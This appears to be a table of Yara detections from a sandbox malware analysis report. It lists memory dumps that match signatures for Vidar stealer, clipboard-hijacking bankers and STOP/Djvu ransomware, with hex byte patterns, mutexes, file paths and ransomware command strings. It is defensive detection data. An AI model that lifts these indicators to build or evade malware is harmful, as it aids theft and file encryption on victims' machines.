F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
8.2.build2.exe.35815a0.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
27.2.mstsca.exe.9715a0.1.raw.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
27.2.mstsca.exe.9715a0.1.raw.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1203:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
27.2.mstsca.exe.9715a0.1.raw.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0xefa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0xf87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0xf87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x12ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1335:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
11.2.build3.exe.9815a0.1.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x603:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
11.2.build3.exe.9815a0.1.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x6ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x735:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
9.2.build2.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
9.2.build2.exe.400000.0.raw.unpack	HiddenCobra_BANKSHOT_Gen	Detects Hidden Cobra BANKSHOT trojan	Florian Roth	0x3000b:$x5: vchost.exe 0x3100b:$x5: vchost.exe
9.2.build2.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
26.2.mstsca.exe.400000.0.raw.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
26.2.mstsca.exe.400000.0.raw.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1e03:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
26.2.mstsca.exe.400000.0.raw.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x1afa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x1b87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1b87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1ead:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1f35:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
16.2.mstsca.exe.9615a0.1.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x603:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
16.2.mstsca.exe.9615a0.1.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x6ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x735:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
30.2.mstsca.exe.400000.0.raw.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
30.2.mstsca.exe.400000.0.raw.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1e03:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
30.2.mstsca.exe.400000.0.raw.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x1afa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x1b87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1b87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1ead:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1f35:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
8.2.build2.exe.35815a0.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
28.2.mstsca.exe.400000.0.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
28.2.mstsca.exe.400000.0.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1203:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
28.2.mstsca.exe.400000.0.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0xefa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0xf87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0xf87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x12ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1335:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
29.2.mstsca.exe.9615a0.1.raw.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
29.2.mstsca.exe.9615a0.1.raw.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1203:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
29.2.mstsca.exe.9615a0.1.raw.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0xefa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0xf87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0xf87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x12ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1335:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
13.2.build3.exe.400000.0.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
13.2.build3.exe.400000.0.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1203:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
13.2.build3.exe.400000.0.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0xefa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0xf87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0xf87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x12ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1335:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
16.2.mstsca.exe.9615a0.1.raw.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
16.2.mstsca.exe.9615a0.1.raw.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1203:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
16.2.mstsca.exe.9615a0.1.raw.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0xefa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0xf87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0xf87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x12ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1335:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
11.2.build3.exe.9815a0.1.raw.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
11.2.build3.exe.9815a0.1.raw.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1203:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
11.2.build3.exe.9815a0.1.raw.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0xefa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0xf87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0xf87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x12ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1335:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
17.2.mstsca.exe.400000.0.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
17.2.mstsca.exe.400000.0.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1203:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
17.2.mstsca.exe.400000.0.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0xefa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0xf87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0xf87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x12ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1335:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
29.2.mstsca.exe.9615a0.1.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x603:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
29.2.mstsca.exe.9615a0.1.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x6ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x735:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
17.2.mstsca.exe.400000.0.raw.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
17.2.mstsca.exe.400000.0.raw.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1e03:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
17.2.mstsca.exe.400000.0.raw.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x1afa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x1b87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1b87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1ead:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1f35:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
23.2.mstsca.exe.8f15a0.1.raw.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
23.2.mstsca.exe.8f15a0.1.raw.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1203:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
23.2.mstsca.exe.8f15a0.1.raw.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0xefa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0xf87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0xf87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x12ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1335:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
13.2.build3.exe.400000.0.raw.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
13.2.build3.exe.400000.0.raw.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1e03:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
13.2.build3.exe.400000.0.raw.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x1afa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x1b87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1b87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1ead:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1f35:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
22.2.sIQywRNC5M.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
22.2.sIQywRNC5M.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
22.2.sIQywRNC5M.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
7.2.sIQywRNC5M.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
7.2.sIQywRNC5M.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
7.2.sIQywRNC5M.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
24.2.sIQywRNC5M.exe.5db15a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
24.2.sIQywRNC5M.exe.5db15a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
24.2.sIQywRNC5M.exe.5db15a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
21.2.sIQywRNC5M.exe.5df15a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
21.2.sIQywRNC5M.exe.5df15a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
